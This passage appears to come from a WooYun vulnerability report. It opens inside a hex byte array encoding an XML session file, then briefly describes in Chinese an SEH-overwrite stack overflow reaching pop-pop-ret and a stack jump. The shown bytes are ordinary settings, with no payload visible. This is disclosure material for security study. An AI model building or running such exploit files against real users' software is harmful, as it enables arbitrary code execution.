0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22,
0x74, 0x61, 0x62, 0x77, 0x69, 0x64, 0x74, 0x68,
0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D,
0x22, 0x34, 0x38, 0x32, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x72, 0x65, 0x6D, 0x6F, 0x74, 0x65, 0x68,
0x65, 0x69, 0x67, 0x68, 0x74, 0x22, 0x20, 0x76,
0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x37, 0x32,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x73, 0x6F, 0x72,
0x74, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65,
0x3D, 0x22, 0x30, 0x2B, 0x30, 0x2B, 0x30, 0x2B,
0x30, 0x2B, 0x30, 0x2B, 0x30, 0x2B, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x73, 0x69, 0x74, 0x65, 0x73,
0x69, 0x7A, 0x65, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x6D, 0x6F, 0x6E, 0x69, 0x74, 0x6F, 0x72,
0x66, 0x6F, 0x6E, 0x74, 0x22, 0x20, 0x76, 0x61,
0x6C, 0x75, 0x65, 0x3D, 0x22, 0x63, 0x6F, 0x75,
0x72, 0x69, 0x65, 0x72, 0x20, 0x6E, 0x65, 0x77,
0x2C, 0x38, 0x2C, 0x30, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x66,
0x6F, 0x6E, 0x74, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x63, 0x6F, 0x75, 0x72,
0x69, 0x65, 0x72, 0x20, 0x6E, 0x65, 0x77, 0x2C,
0x38, 0x2C, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75,
0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22,
0x73, 0x74, 0x61, 0x74, 0x75, 0x73, 0x66, 0x6F,
0x6E, 0x74, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75,
0x65, 0x3D, 0x22, 0x63, 0x6F, 0x75, 0x72, 0x69,
0x65, 0x72, 0x20, 0x6E, 0x65, 0x77, 0x2C, 0x38,
0x2C, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x65,
0x64, 0x69, 0x74, 0x66, 0x6F, 0x6E, 0x74, 0x22,
0x20, 0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22,
0x63, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20,
0x6E, 0x65, 0x77, 0x2C, 0x38, 0x2C, 0x30, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C,
0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61,
0x6D, 0x65, 0x3D, 0x22, 0x6D, 0x73, 0x67, 0x66,
0x6F, 0x6E, 0x74, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x63, 0x6F, 0x75, 0x72,
0x69, 0x65, 0x72, 0x20, 0x6E, 0x65, 0x77, 0x2C,
0x38, 0x2C, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x3C, 0x74, 0x61, 0x73, 0x6B, 0x73,
0x20, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65,
0x3D, 0x22, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31,
0x31, 0x30, 0x30, 0x30, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F, 0x6F, 0x6C,
0x62, 0x61, 0x72, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x6D, 0x65, 0x6E, 0x75, 0x22, 0x20,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22,
0x30, 0x2C, 0x30, 0x2C, 0x31, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F, 0x6F,
0x6C, 0x62, 0x61, 0x72, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x61, 0x64, 0x64, 0x72, 0x65,
0x73, 0x73, 0x22, 0x20, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x3D, 0x22, 0x33, 0x2C, 0x30, 0x2C,
0x31, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x74, 0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x70,
0x72, 0x6F, 0x6D, 0x70, 0x74, 0x73, 0x22, 0x20,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22,
0x32, 0x2C, 0x31, 0x39, 0x38, 0x2C, 0x31, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x74,
0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x73, 0x74, 0x61,
0x6E, 0x64, 0x61, 0x72, 0x64, 0x22, 0x20, 0x6C,
0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x31,
0x2C, 0x30, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x30,
0x2C, 0x32, 0x2C, 0x33, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F, 0x6F, 0x6C,
0x62, 0x61, 0x72, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x71, 0x75, 0x65, 0x75, 0x65, 0x22,
0x20, 0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D,
0x22, 0x31, 0x2C, 0x38, 0x35, 0x2C, 0x31, 0x2C,
0x35, 0x2C, 0x36, 0x2C, 0x31, 0x36, 0x2C, 0x30,
0x2C, 0x38, 0x2C, 0x37, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F, 0x6F, 0x6C,
0x62, 0x61, 0x72, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x63, 0x6F, 0x6D, 0x6D, 0x61, 0x6E,
0x64, 0x73, 0x22, 0x20, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x3D, 0x22, 0x31, 0x2C, 0x32, 0x31,
0x36, 0x2C, 0x31, 0x2C, 0x39, 0x2C, 0x31, 0x30,
0x2C, 0x31, 0x31, 0x2C, 0x31, 0x32, 0x2C, 0x31,
0x33, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x74, 0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x74,
0x6F, 0x6F, 0x6C, 0x73, 0x22, 0x20, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x31, 0x2C,
0x33, 0x34, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x34,
0x2C, 0x31, 0x35, 0x2C, 0x32, 0x32, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F,
0x6F, 0x6C, 0x62, 0x61, 0x72, 0x20, 0x6E, 0x61,
0x6D, 0x65, 0x3D, 0x22, 0x73, 0x65, 0x61, 0x72,
0x63, 0x68, 0x22, 0x20, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x3D, 0x22, 0x31, 0x2C, 0x34, 0x32,
0x30, 0x2C, 0x31, 0x2C, 0x31, 0x37, 0x2C, 0x31,
0x38, 0x2C, 0x31, 0x39, 0x2C, 0x30, 0x2C, 0x32,
0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x74, 0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x63,
0x75, 0x73, 0x74, 0x6F, 0x6D, 0x22, 0x20, 0x6C,
0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x31,
0x2C, 0x35, 0x32, 0x38, 0x2C, 0x31, 0x2C, 0x32,
0x31, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x74, 0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x74,
0x61, 0x73, 0x6B, 0x73, 0x22, 0x20, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x31, 0x2C,
0x31, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C,
0x30, 0x2C, 0x39, 0x35, 0x36, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x75, 0x70, 0x64,
0x61, 0x74, 0x65, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x73, 0x79, 0x6E, 0x63, 0x22, 0x20,
0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x34,
0x31, 0x33, 0x36, 0x37, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x3C, 0x2F, 0x73, 0x65, 0x73, 0x73,
0x69, 0x6F, 0x6E, 0x3E, 0x0D, 0x0A
通过调试器打开应用程序,在地址栏选择地址并连接
当程序异常时,可以看到SEH处理函数已被覆盖为pop pop ret
并且顺利执行到栈中的跳转指令
修复方案:
版权声明:转载请注明来源 cssembly@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝